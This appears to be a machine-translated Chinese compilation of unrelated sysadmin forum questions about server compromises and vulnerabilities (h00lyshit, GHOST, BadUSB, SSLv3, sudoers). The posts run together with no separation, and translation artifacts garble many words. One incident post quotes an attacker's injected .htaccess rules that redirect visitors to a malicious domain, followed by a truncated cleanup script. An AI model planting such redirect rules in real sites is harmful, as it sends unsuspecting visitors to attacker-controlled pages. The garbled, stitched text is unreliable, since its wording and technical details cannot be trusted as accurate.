所以昨天我发现我的服务器是通过h00lyshit利用。 到目前为止,我删除了所有可能与漏洞关联的文件。 我也删除了~/.ssh/authorized_keys所有ssh密钥。 我将root密码更改为25个随机字符密码,并更改了mysql密码。 另外我认为攻击者来自意大利,因为我只需要从我的国家进入,我阻止了除我自己的国家之外的每个IP范围,这是否有帮助? 你们有什么好build议我应该怎么做? 我打算通过ssh禁用根目录(我应该尽早完成,我知道:()。有没有办法来检查他是否可以再次访问我的服务器? 也没有损失幸运,哦,我运行Debian Lenny与2.6.26内核,如果有人感兴趣。 PS:耶我的第一个问题:D
在sudoers文件中添加这个命令是否安全? mike ALL= NOPASSWD:/bin/chown -R www-data\:www-data /var/www 这是我想运行的唯一命令 $mike@ubuntu: sudo chown -R www-data:www-data /var/www 谢谢。
在Debian Lenny和Squeeze上修改GHOST有一个正确的方法吗? 根据这个链接,没有打算修补Lenny https://security-tracker.debian.org/tracker/CVE-2015-0235 谢谢!
我正在寻找一个新的pipe理工具包的工具,并会重视一些build议。 我想对一些XSS(跨站点脚本)恶意网站进行一些“自动”testing,同时检查SQL注入机会。 我意识到自动化的工具方法不一定是唯一的或最好的解决scheme,但我希望这会给我一个很好的开始。 我需要扫描的网站覆盖从PHP / MySQL到Coldfusion的堆栈范围,一些经典的ASP和ASP.NET混合在一起是很好的措施。 你会用什么工具来扫描Web应用程序的恶意? (请注意我直接关注networking应用程序,而不是服务器本身)。
我们运营一个托pipe大约300个网站的网站服务器。 昨天早上,一个脚本在大多数(但不是全部)站点的document_root下的每个目录中都放置了.htaccess文件,这些文件由www-data(apache用户)拥有。 .htaccess文件的内容是这样的: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} 谷歌search该url(这是“杀毒软件”的md5哈希),我发现这一切都发生在互联网上,并正在寻找已经处理这个问题的人,并确定漏洞是在哪里 。 我搜查了大部分日志,但还没有发现任何结论。 有没有其他人经历过比我更深入的洞察? 到目前为止我们已经确定: 所做的更改是作为万维网数据,所以Apache或它的插件可能是罪魁祸首 所有的改变都是在15分钟内完成的,所以可能是自动的 由于我们的网站域名广泛不同,我认为一个网站上的单个漏洞是负责任的(而不是每个网站上的常见漏洞) 如果一个.htaccess文件已经存在,并且可以通过www-data写入,那么脚本就很实用,并且简单地将上面的代码行附加到文件的末尾(使其易于反转) 任何更多的提示将不胜感激。 == ==编辑 对于那些需要它的人,这里是我用来清理.htaccess文件的脚本: #!/bin/bash PATT=84f6a4eef61784b33e4acbd32c8fdd72.com DIR=/mnt TMP=/tmp/`mktemp "XXXXXX"` find $DIR -name .htaccess|while read FILE; do if ( grep $PATT "$FILE" > /dev/null); then if [ `cat "$FILE"|wc -l` -eq 4 ]; […]
我认为这是一些types的黑客攻击。 我试图谷歌它,但我得到的网站看起来像他们已经被利用。 我看到了一个看起来像这样的页面的请求。 /listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED “(200 OK)ACCEPTED”是奇怪的。 但它似乎没有做任何事情。 我在IIS 5和ASP 3.0上运行。 这是“黑客”意味着一些其他types的Web服务器? 编辑: 普通的请求看起来像: /listMessages.asp?page=8&catid=5
有消息称,一个不可修复和不可修复的 USB固件利用“是在那里”。 这似乎与服务器无关,但由于Phison的受影响硬件未被披露 ,所以连接到内部networking的设备可能被感染或潜在地受到攻击。 这可能是networking和系统pipe理员,ICT顾问等最糟糕的噩梦。 有没有办法检查USB设备是否有潜在的BadUSB漏洞,以便USB设备可以“由IT部门审查”?
这个漏洞是在glibc中发现的,请参阅这个黑客新闻发布的更多信息。 正如debian bug跟踪器中所描述的,这个漏洞已经在testing中被修补,并且不稳定。 我想尽快修补它,所以可以从其中一个版本安装修补程序包,如果是的话,我该怎么做?
有没有办法在Windows中检查说安全公告MS**-***或CVE-****-*****已被修补? 比如类似于RedHat的rpm -q –changelog service Windows 2008 R2 SP1
OpenSSL刚刚宣布了内存例程中的另一个新漏洞。 您可以在这里阅读所有内容: https : //www.openssl.org/news/secadv_20141015.txt 解决方法是禁用SSLv3。 这将完全禁用我们网站上的HTTPS? 还有什么客户依赖SSLv3,应该关心支持他们吗?